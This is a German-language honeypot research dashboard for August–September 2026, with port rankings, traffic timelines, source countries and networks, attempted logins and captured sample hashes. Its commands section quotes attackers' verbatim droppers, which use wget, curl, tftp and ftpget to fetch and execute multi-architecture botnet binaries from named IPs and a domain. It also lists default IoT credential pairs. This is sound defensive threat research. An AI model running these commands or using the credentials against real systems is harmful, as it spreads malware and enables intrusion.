Port-Rangliste #
Haupttabelle des Experiments: Welche Ports standen bei den Angreifern am meisten im Fokus? Die Tabelle lässt sich nach einer beliebigen Spalte sortieren, nach Server filtern und nach einem bestimmten Port, einem Portbereich oder einem Dienstnamen durchsuchen. Auf jede Zeile kann verwiesen werden, zum Beispiel #port-3389.
| Port | Protokoll | Üblicher Service | Server | Versuche | Eindeutige IP-Adresse | Anteil |
|---|---|---|---|---|---|---|
| 5901 | tcp | VNC | beide Server | 883.864 | 801 | 16,1 % |
| 3389 | tcp | RDP | beide Server | 734.148 | 2.425 | 13,4 % |
| 3389 | tcp | RDP | srv4 | 726.599 | 1.515 | 18,1 % |
| 5900 | tcp | VNC | beide Server | 707.172 | 1.343 | 12,9 % |
| 445 | tcp | SMB | beide Server | 459.930 | 6.055 | 8,4 % |
| 5901 | tcp | VNC | srv4 | 449.586 | 598 | 11,2 % |
| 5901 | tcp | VNC | srv3 | 434.278 | 655 | 29,7 % |
| 445 | tcp | SMB | srv3 | 415.953 | 5.570 | 28,4 % |
| 5900 | tcp | VNC | srv4 | 360.884 | 1.098 | 9,0 % |
| 5900 | tcp | VNC | srv3 | 346.288 | 1.176 | 23,7 % |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- honeypot-ports-aggregated-20260922.csv
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Entwicklung im Zeitverlauf #
Das Ereignisvolumen im Zeitverlauf, unterteilt in Kampagnen und Hintergrundrauschen, sowie darunter die Anzahl der eindeutigen IP-Adressen. Den Logdateien der Agenten zufolge konnten die einzelnen Kampagnen den Großteil des täglichen Datenverkehrs erzeugen. Ohne diese Aufteilung würde das Diagramm ein falsches Bild vermitteln: Die Kampagne würde wie ein Trend erscheinen und ihr Ende wie ein Ausfall der Datenerfassung.
Wie genau sich die Kampagne vom Grundrauschen abhebt, wird durch das unter dem Diagramm angegebene Skript bestimmt.
Anzahl der Ereignisse
- Grundrauschen
- Kampagnen
Eindeutige IP-Adressen
Anzahl der verschiedenen Quell-IP-Adressen pro Tag.
- srv3
- srv4
Einzigartige IP-Adressen lassen sich nicht über die Server hinweg zusammenzählen – dieselbe Adresse könnte beide angegriffen haben. Jeder Server hat daher eine eigene Zeile.
Abgedunkelte Spalten und leere Kreise stehen für unvollständige Zeiträume: Das Erfassungsfenster beginnt und endet um 12:00 Uhr UTC, und der durch den ausgewählten Bereich abgeschnittene Zeitraum ist kürzer als die anderen. Vergleichen Sie ihn daher nicht mit den benachbarten Zeiträumen.
Werte als Tabelle anzeigen
| Tag (UTC) | Ereignis | Kampagnen | Grundrauschen | Eindeutige IP-Adresse srv3 | Eindeutige IP-Adresse srv4 |
|---|---|---|---|---|---|
| 22.08.2026 · unvollständig | 82.303 | 59.843 | 22.460 | 547 | 1.870 |
| 23.08.2026 | 79.276 | 34.177 | 45.099 | 1.292 | 3.529 |
| 24.08.2026 | 48.928 | 10.775 | 38.153 | 1.429 | 3.309 |
| 25.08.2026 | 69.902 | 29.825 | 40.077 | 1.552 | 3.824 |
| 26.08.2026 | 68.792 | 28.709 | 40.083 | 1.552 | 3.775 |
| 27.08.2026 | 204.306 | 161.642 | 42.664 | 1.585 | 4.301 |
| 28.08.2026 | 201.823 | 159.044 | 42.779 | 1.364 | 4.083 |
| 29.08.2026 | 206.275 | 171.641 | 34.634 | 1.029 | 3.853 |
| 30.08.2026 | 185.689 | 148.263 | 37.426 | 975 | 4.176 |
| 31.08.2026 | 539.919 | 504.248 | 35.671 | 1.488 | 4.183 |
| 01.09.2026 | 720.200 | 666.265 | 53.935 | 1.573 | 4.500 |
| 02.09.2026 | 275.758 | 209.955 | 65.803 | 1.859 | 4.281 |
| 03.09.2026 | 274.675 | 227.972 | 46.703 | 1.621 | 4.343 |
| 04.09.2026 | 219.422 | 167.450 | 51.972 | 1.628 | 4.087 |
| 05.09.2026 | 154.023 | 95.631 | 58.392 | 1.535 | 4.117 |
| 06.09.2026 | 131.807 | 46.399 | 85.408 | 1.637 | 4.349 |
| 07.09.2026 | 184.403 | 94.877 | 89.526 | 1.494 | 4.402 |
| 08.09.2026 | 169.747 | 59.781 | 109.966 | 1.758 | 4.609 |
| 09.09.2026 | 177.572 | 48.861 | 128.711 | 1.733 | 4.671 |
| 10.09.2026 | 193.394 | 60.866 | 132.528 | 1.818 | 5.095 |
| 11.09.2026 | 210.418 | 63.267 | 147.151 | 1.747 | 5.402 |
| 12.09.2026 | 254.827 | 82.831 | 171.996 | 1.859 | 5.450 |
| 13.09.2026 | 236.911 | 105.016 | 131.895 | 1.854 | 5.434 |
| 14.09.2026 | 213.640 | 83.835 | 129.805 | 1.994 | 5.516 |
| 15.09.2026 | 272.074 | 159.141 | 112.933 | 1.884 | 5.303 |
| 16.09.2026 · unvollständig | 101.115 | 28.713 | 72.402 | 1.386 | 3.449 |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- timeline-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Karte zur Herkunft der Verbindungen #
Woher die Verbindungen kamen. Das Land wird anhand der registrierten IP-Adresse bestimmt, nicht anhand des tatsächlichen Standorts des Angreifers – hinter der Adresse kann sich ein gemieteter Server oder ein infizierter Computer an einem beliebigen Ort der Welt verbergen. Die genauen Zahlen finden Sie in den folgenden Tabellen.
Die Karte wird vom Dienst Datawrapper dargestellt; beim Laden der Karte stellt der Browser eine Verbindung zu dessen Servern her. Karte separat öffnen
Geografie und Netzwerke #
Woher der Datenverkehr stammte, basierend auf der Geolokalisierung der Quell-IP-Adresse und zu welchen autonomen Systemen (ASN) die Adressen gehören. Die Geolokalisierung gibt an, wo die Adresse registriert ist, nicht, wo sich der Angreifer befindet.
Die häufigsten Länder
Die größten Netzwerke (ASN)
| ASN | Netzwerk | Ereignis | Eindeutige IP-Adresse | Anteil |
|---|---|---|---|---|
| 51167 | CONTABO DE |
1.036.962 | 168 | 18,9 % |
| 22295 | ADVIN US |
924.717 | 7 | 16,9 % |
| 36352 | AS-COLOCROSSING US |
388.883 | 131 | 7,1 % |
| 212238 | CDNEXT GB |
385.498 | 98 | 7,0 % |
| 396982 | GOOGLE-CLOUD-PLATFORM US |
171.392 | 3.170 | 3,1 % |
| 14061 | DIGITALOCEAN-ASN US |
138.119 | 2.732 | 2,5 % |
| 45090 | TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited CN |
133.244 | 114 | 2,4 % |
| 209334 | MODAT-01 NL |
114.475 | 93 | 2,1 % |
| 197170 | TECHTIES-AS - TechTies Inc. SC |
110.821 | 185 | 2,0 % |
| 45102 | ALIBABA-CN-NET Alibaba US Technology Co., Ltd. CN |
101.319 | 303 | 1,8 % |
Werte als Tabelle anzeigen
| Land | Ereignis | Eindeutige IP-Adresse | Anteil |
|---|---|---|---|
| US | 2.057.660 | 13.624 | 37,6 % |
| DE | 1.230.744 | 1.111 | 22,5 % |
| CN | 556.778 | 5.671 | 10,2 % |
| GB | 486.870 | 2.870 | 8,9 % |
| SC | 184.746 | 319 | 3,4 % |
| NL | 120.671 | 174 | 2,2 % |
| TN | 96.601 | 94 | 1,8 % |
| VN | 64.512 | 644 | 1,2 % |
| MX | 59.561 | 281 | 1,1 % |
| IN | 49.705 | 850 | 0,9 % |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- geo-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Anmeldedaten #
Die Kombinationen aus Benutzername und Passwort, die Angreifer ausprobiert haben, sowie die am häufigsten getesteten Benutzernamen. Die Werte werden genau so angezeigt, wie sie eingegangen sind.
Die am häufigsten getesteten Benutzernamen
Die häufigsten Kombinationen
| Name | Passwort | Versuche | Eindeutige IP-Adresse |
|---|---|---|---|
root |
(leer) | 3.084 | 219 |
admin |
admin |
2.649 | 849 |
enable\x00 |
linuxshell\x00 |
1.955 | 24 |
admin |
(leer) | 1.939 | 69 |
root |
xc3511 |
1.591 | 76 |
root |
admin |
1.529 | 160 |
root |
vizxv |
1.523 | 120 |
root |
123456 |
1.207 | 142 |
support |
support |
990 | 129 |
enable\x00 |
system\x00 |
983 | 27 |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- credentials-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Was geschah nach der Anmeldung? #
Befehle, die Angreifer in der emulierten Shell eingegeben haben, sortiert nach Häufigkeit. Es handelt sich um die Eingaben des Angreifers, nicht um Code, der tatsächlich auf dem Server ausgeführt würde.
| Befehl | Anzahl | Beziehungen |
|---|---|---|
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-p.s-l.Sakura; chmod +x m-p.s-l.Sakura; ./m-p.s-l.Sakura; rm -rf m-p.s-l.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/s-h.4-.Sakura; chmod +x s-h.4-.Sakura; ./s-h.4-.Sakura; rm -rf s-h.4-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-8.6-.Sakura; chmod +x x-8.6-.Sakura; ./x-8.6-.Sakura; rm -rf x-8.6-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-6.Sakura; chmod +x a-r.m-6.Sakura; ./a-r.m-6.Sakura; rm -rf a-r.m-6.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-3.2-.Sakura; chmod +x x-3.2-.Sakura; ./x-3.2-.Sakura; rm -rf x-3.2-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-7.Sakura; chmod +x a-r.m-7.Sakura; ./a-r.m-7.Sakura; rm -rf a-r.m-7.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/i-5.8-6.Sakura; chmod +x i-5.8-6.Sakura; ./i-5.8-6.Sakura; rm -rf i-5.8-6.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-6.8-k.Sakura; chmod +x m-6.8-k.Sakura; ./m-6.8-k.Sakura; rm -rf m-6.8-k.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-4.Sakura; chmod +x a-r.m-4.Sakura; ./a-r.m-4.Sakura; rm -rf a-r.m-4.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-5.Sakura; chmod +x a-r.m-5.Sakura; ./a-r.m-5.Sakura; rm -rf a-r.m-5.Sakura
|
1 | 1 |
#!/bin/sh
wget http://74.81.40.155/iran.x86_64 -O /tmp/iran.x86_64 || curl http://74.81.40.155/iran.x86_64 -o /tmp/iran.x86_64; chmod 777 /tmp/iran.x86_64; /tmp/iran.x86_64 default;
wget http://74.81.40.155/iran.aarch64 -O /tmp/iran.aarch64 || curl http://74.81.40.155/iran.aarch64 -o /tmp/iran.aarch64; chmod 777 /tmp/iran.aarch64; /tmp/iran.aarch64 default;
wget http://74.81.40.155/iran.m68k -O /tmp/iran.m68k || curl http://74.81.40.155/iran.m68k -o /tmp/iran.m68k; chmod 777 /tmp/iran.m68k; /tmp/iran.m68k default;
wget http://74.81.40.155/iran.mips -O /tmp/iran.mips || curl http://74.81.40.155/iran.mips -o /tmp/iran.mips; chmod 777 /tmp/iran.mips; /tmp/iran.mips default;
wget http://74.81.40.155/iran.mipsel -O /tmp/iran.mipsel || curl http://74.81.40.155/iran.mipsel -o /tmp/iran.mipsel; chmod 777 /tmp/iran.mipsel; /tmp/iran.mipsel default;
wget http://74.81.40.155/iran.powerpc -O /tmp/iran.powerpc || curl http://74.81.40.155/iran.powerpc -o /tmp/iran.powerpc; chmod 777 /tmp/iran.powerpc; /tmp/iran.powerpc default;
wget http://74.81.40.155/iran.sparc -O /tmp/iran.sparc || curl http://74.81.40.155/iran.sparc -o /tmp/iran.sparc; chmod 777 /tmp/iran.sparc; /tmp/iran.sparc default;
wget http://74.81.40.155/iran.sh4 -O /tmp/iran.sh4 || curl http://74.81.40.155/iran.sh4 -o /tmp/iran.sh4; chmod 777 /tmp/iran.sh4; /tmp/iran.sh4 default;
wget http://74.81.40.155/iran.arc -O /tmp/iran.arc || curl http://74.81.40.155/iran.arc -o /tmp/iran.arc; chmod 777 /tmp/iran.arc; /tmp/iran.arc default;
wget http://74.81.40.155/iran.i486 -O /tmp/iran.i486 || curl http://74.81.40.155/iran.i486 -o /tmp/iran.i486; chmod 777 /tmp/iran.i486; /tmp/iran.i486 default;
wget http://74.81.40.155/iran.armv4l -O /tmp/iran.armv4l || curl http://74.81.40.155/iran.armv4l -o /tmp/iran.armv4l; chmod 777 /tmp/iran.armv4l; /tmp/iran.armv4l default;
wget http://74.81.40.155/iran.armv5l -O /tmp/iran.armv5l || curl http://74.81.40.155/iran.armv5l -o /tmp/iran.armv5l; chmod 777 /tmp/iran.armv5l; /tmp/iran.armv5l default;
wget http://74.81.40.155/iran.armv6l -O /tmp/iran.armv6l || curl http://74.81.40.155/iran.armv6l -o /tmp/iran.armv6l; chmod 777 /tmp/iran.armv6l; /tmp/iran.armv6l default;
|
1 | 1 |
#!/bin/sh
wget http://176.65.139.206/iran.x86_64 -O x86_64 || curl http://176.65.139.206/iran.x86_64 -o x86_64; chmod 777 x86_64; ./x86_64 catloader;
wget http://176.65.139.206/iran.aarch64 -O aarch64 || curl http://176.65.139.206/iran.aarch64 -o aarch64; chmod 777 aarch64; ./aarch64catloader;
wget http://176.65.139.206/iran.m68k -O m68k || curl http://176.65.139.206/iran.m68k -o m68k; chmod 777 m68k; ./m68k catloader;
wget http://176.65.139.206/iran.mips -O mips || curl http://176.65.139.206/iran.mips -o mips; chmod 777 mips; ./mips catloader;
wget http://176.65.139.206/iran.mipsel -O mipsel || curl http://176.65.139.206/iran.mipsel -o mipsel; chmod 777 mipsel; ./mipsel catloader;
wget http://176.65.139.206/iran.powerpc -O powerpc || curl http://176.65.139.206/iran.powerpc -o powerpc; chmod 777 powerpc; ./powerpc catloader;
wget http://176.65.139.206/iran.sparc -O sparc || curl http://176.65.139.206/iran.sparc -o sparc; chmod 777 sparc; ./sparc catloader;
wget http://176.65.139.206/iran.sh4 -O sh4 || curl http://176.65.139.206/iran.sh4 -o sh4; chmod 777 sh4; ./sh4 catloader;
wget http://176.65.139.206/iran.arc -O arc || curl http://176.65.139.206/iran.arc -o arc; chmod 777 arc; ./arc catloader;
wget http://176.65.139.206/iran.i486 -O i486 || curl http://176.65.139.206/iran.i486 -o i486; chmod 777 i486; ./i486 catloader;
wget http://176.65.139.206/iran.armv4l -O armv4l || curl http://176.65.139.206/iran.armv4l -o armv4l; chmod 777 armv4l; ./armv4l catloader;
wget http://176.65.139.206/iran.armv5l -O armv5l || curl http://176.65.139.206/iran.armv5l -o armv5l; chmod 777 armv5l; ./armv5l catloader;
wget http://176.65.139.206/iran.armv6l -O armv6l || curl http://176.65.139.206/iran.armv6l -o armv6l; chmod 777 armv6l; ./armv6l catloader;
wget http://176.65.139.206/iran.armv7l -O armv7l || curl http://176.65.139.206/iran.armv7l -o armv7l; chmod 777 armv7l; ./armv7l catloader;
|
1 | 1 |
':"<];#=!>``` |
1 | 1 |
(ftpget 77.90.185.66 f ftpget || busybox ftpget 77.90.185.66 f ftpget) > f; chmod 777 f; ./f; rm -rf f |
1 | 1 |
(tftp -g 77.90.185.66 -r tftp -l- || busybox tftp -g 77.90.185.66 -r tftp -l-) > t; chmod 777 t; ./t; rm -rf t |
1 | 1 |
(W=main_x86_64; M=$(uname -m 2>/dev/null); case "$M" in *aarch64*|*arm64*) W=main_arm64;; *mips*el*) W=main_mpsl;; *mips*) W=main_mips;; *armv7*|*armv6*) W=main_arm7;; *arm*) W=main_arm7;; esac); wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || busybox wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || curl -fsSL -o /tmp/.pf http://pingg.sbs/$W; chmod +x /tmp/.pf 2>/dev/null; /tmp/.pf $W >/dev/null 2>&1 & |
1 | 1 |
(wget http://77.90.185.66/wget -O- || busybox wget http://77.90.185.66/wget -O-) > w; chmod 777 w; ./w; rm -rf w |
1 | 1 |
/bin/busybox cat /proc/mounts; /bin/busybox htm6BVA6 |
1 | 1 |
/bin/busybox cat /proc/mounts; /bin/busybox jVQTSekR |
1 | 1 |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- attacker-commands-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Entnommene Proben #
Dateien, die Angreifer je nach Typ und Architektur herunterzuladen oder hochzuladen versucht haben.
Nach Dateityp
Nach Architektur
| SHA-256 | Typ | Architektur | Größe | Zum ersten Mal | Aufgenommen | Suchen |
|---|---|---|---|---|---|---|
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23.08.2026 16:54:42 | 492 | VirusTotal |
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23.08.2026 10:04:58 | 330 | VirusTotal |
| f2e2ffc024ab99eb49fa207756481aa80713398142f30888aebace5706909b36 | data | — | 697 B | 23.08.2026 12:07:36 | 243 | VirusTotal |
| a6296a79f44e21b76604d2d2bbf795d2cf380f70e39d45fbf166707ff3b4a6a4 | script | — | 306 B | 22.08.2026 18:09:16 | 208 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22.08.2026 18:09:19 | 206 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22.08.2026 15:49:53 | 205 | VirusTotal |
| a9b1c85a7bd78dd1112ecc75c9070ea8c53078831a17aa09ebeb287fe6e21b72 | data | — | 9 B | 07.09.2026 11:48:13 | 59 | VirusTotal |
| 1193dde1c831808bf6f2db6f5b850b846b8a7f870873ec3b8a347f21cc5d96e3 | data | — | 9 B | 07.09.2026 11:48:13 | 59 | VirusTotal |
| 14049d077b887cbb8060d223ff9626664a044a8c3145f6a2b95a325df36b279b | data | — | 7 B | 13.09.2026 15:31:53 | 58 | VirusTotal |
| 43728fbfb98bb39ff61a2db0fc2905bd6937997062b05b9ab8b186fdee18c09a | data | — | 399 B | 23.08.2026 00:49:29 | 47 | VirusTotal |
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- samples-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Serververgleich #
Wie viel mehr Traffic hat die größere Fläche gebracht und worin unterscheiden sich die beiden Server hinsichtlich ihrer Struktur?
| Zeiger | srv3 | srv4 | srv4 / srv3 |
|---|---|---|---|
| Verbindungsversuche (Port-Rangliste) | 1.462.877 | 4.014.322 | 2,7× |
| Betroffene Ports | 45 | 58.628 | 1.302,8× |
| Ereignisse (Entwicklung im Zeitverlauf) | 1.462.877 | 4.014.322 | 2,7× |
srv3 die häufigsten Ports
srv4 die häufigsten Ports
- Zeitfenster
- 21.08.2026 – 16.09.2026
- Quelldaten
- honeypot-ports-aggregated-20260922.csv, timeline-aggregated derzeit nicht verfügbar
- Skript
- wird veröffentlicht
- Format
- Felddokumentation
Haben Sie einen Fehler, fehlende Daten oder eine Offenlegung sensibler Daten entdeckt? Problem melden